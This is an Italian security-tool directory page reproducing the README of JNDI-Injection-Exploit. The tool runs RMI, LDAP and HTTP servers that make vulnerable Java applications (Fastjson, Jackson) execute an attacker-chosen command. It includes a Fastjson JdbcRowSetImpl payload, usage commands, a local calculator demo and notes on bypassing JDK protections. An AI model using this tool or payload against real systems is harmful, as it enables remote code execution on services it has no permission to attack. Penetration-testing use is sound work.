Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
JNDI-Injection-Exploit — JNDI注入测试工具(Uno strumento che genera link JNDI può avviare diversi server per sfruttare la vulnerabilità di JNDI Injection,come Jackson,Fastjson,ecc) | Kitploit
Strumenti/GitHubGitHub/welk1n/jndi-injection-exploit
Generazione di PayloadAnalisi delle VulnerabilitàExploitSfruttamento di Applicazioni Web
GitHubwelk1n/jndi-injection-exploit

JNDI-Injection-Exploit

JNDI注入测试工具(Uno strumento che genera link JNDI può avviare diversi server per sfruttare la vulnerabilità di JNDI Injection,come Jackson,Fastjson,ecc)

Vedi Repository
2.8k7306 anni faRevisionato da Kitploit

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

JNDI-Injection-Exploit

Materials about JNDI Injection

中文文档

相关文章

Descrizione

JNDI-Injection-Exploit è uno strumento per generare link JNDI funzionanti e fornire servizi di background avviando server RMI, server LDAP e server HTTP. I server RMI e LDAP sono basati su marshals e ulteriormente modificati per collegarsi con il server HTTP.

Utilizzando questo strumento puoi ottenere link JNDI e inserirli nel tuo POC per testare la vulnerabilità.

Ad esempio, questo è un Fastjson vul-poc:

root@kitploit:~
{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"rmi://127.0.0.1:1099/Object","autoCommit":true}

Possiamo sostituire "rmi://127.0.0.1:1099/Object" con il link generato da JNDI-Injection-Exploit per testare la vulnerabilità.

Dichiarazione di non responsabilità

Tutte le informazioni e il codice sono forniti esclusivamente a scopo educativo e/o per testare i propri sistemi per queste vulnerabilità.

Utilizzo

Esegui come

root@kitploit:~
$ java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar [-C] [command] [-A] [address]

dove:

  • -C - comando eseguito nel classfile remoto.

    (opzionale, il comando predefinito è "open /Applications/Calculator.app")

  • -A - l'indirizzo del tuo server, può essere un indirizzo IP o un dominio.

    (opzionale, l'indirizzo predefinito è il primo indirizzo dell'interfaccia di rete)

Punti da tenere a mente:

  • assicurati che le porte del server (1099, 1389, 8180) siano disponibili.

    oppure puoi cambiare la porta predefinita nella classe run.ServerStart riga 26~28.

  • il tuo comando viene passato a Runtime.getRuntime().exec() come parametri,

    quindi devi assicurarti che il tuo comando sia eseguibile nel metodo exec().

    I comandi in bash come "bash -c ...." necessitano di virgolette doppie.

Esempi

Demo locale:

  1. Avvia lo strumento in questo modo:

    root@kitploit:~
    $ java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "open /Applications/Calculator.app" -A "127.0.0.1"
    

    Schermata:

    image-20191018154346759

  2. Supponiamo di iniettare i link JNDI come rmi://ADDRESS/jfxllc generati al passo 1 in un'applicazione vulnerabile che può essere attaccata tramite iniezione JNDI.

    In questo esempio, appare così:

    root@kitploit:~
    public static void main(String[] args) throws Exception{
        InitialContext ctx = new InitialContext();
        ctx.lookup("rmi://127.0.0.1/fgf4fp");
    }
    

    poi quando eseguiamo questo codice, il comando verrà eseguito,

    e il log verrà stampato nella shell:

    image-20191018154515787

Installazione

Possiamo scegliere uno dei due metodi per ottenere il jar.

  1. Scarica l'ultimo jar da Realease.

  2. Clona il codice sorgente in locale e compila (richiede Java 1.8+ e Maven 3.x+).

    root@kitploit:~
    $ git clone https://github.com/welk1n/JNDI-Injection-Exploit.git
    
    root@kitploit:~
    $ cd JNDI-Injection-Exploit
    
    root@kitploit:~
    $ mvn clean package -DskipTests
    

Da fare

  • (Fatto)Combina questo progetto con JNDI-Injection-Bypass per generare link funzionanti quando trustURLCodebase è false nelle versioni superiori di JDK per impostazione predefinita.
  • … ...
Scarica lo strumento